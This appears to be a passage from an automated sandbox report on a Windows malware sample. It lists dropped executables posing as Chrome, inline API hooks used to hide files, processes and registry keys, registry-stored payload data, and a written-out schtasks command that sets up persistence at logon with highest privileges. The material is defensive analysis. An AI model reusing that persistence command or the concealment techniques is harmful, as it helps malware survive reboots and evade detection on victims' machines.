Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 30_2_00007FFF7E3F35CF push cs; iretd	30_2_00007FFF7E3F35D1
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 33_2_00007FFF7E40070C pushad ; ret	33_2_00007FFF7E40070E
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 33_2_00007FFF7E4006CE pushad ; ret	33_2_00007FFF7E4006D0
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 33_2_00007FFF7E4035CF push cs; iretd	33_2_00007FFF7E4035D1
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_00000001400146AD push rcx; retf 003Fh	39_2_00000001400146AE
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_000000014000E348 push rax; retf	39_2_000000014000E351
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_000000014000E350 push rax; retf	39_2_000000014000E351
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDCE94CD push rcx; retf 003Fh	42_2_000001AFDDCE94CE
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD142D8 push rax; retf	42_2_000001AFDDD142D9
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD1A6CD push rcx; retf 003Fh	42_2_000001AFDDD1A6CE
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2B994CD push rcx; retf 003Fh	44_2_00000240B2B994CE
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BC42D8 push rax; retf	44_2_00000240B2BC42D9
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3CE94CD push rcx; retf 003Fh	47_2_000001CAF3CE94CE
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D142D0 push rax; retf	47_2_000001CAF3D142D9

PE file contains sections with non-standard names

Source: ChiefKeefofficialnaxyi_crypted(6).exe.1.dr	Static PE information: section name: .nQuHRq
Source: ChiefKeefofficialnaxyi_crypted(6).exe.1.dr	Static PE information: section name: .9SAT

Source: initial sample

Static PE information: section name: .9SAT entropy: 6.83589844593

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Drops PE files

Source: C:\Users\user\Desktop\Install.exe	File created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\34432.exe	File created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Install.exe	File created: C:\Users\user\AppData\Roaming\34432.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"

Creates job files (autostart)

Source: C:\Windows\System32\nslookup.exe

File created: C:\Windows\Tasks\nslooksvc32.job

Hooking and other Techniques for Hiding and Protection

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x93 0x33 0x35 0x5D 0xDF

Stores large binary data to the registry

Source: C:\Windows\System32\nslookup.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node nslookstager

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\System32\winlogon.exe

Code function: 42_2_000001AFDDD01F20 GetCurrentThread,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,

42_2_000001AFDDD01F20

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Install.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
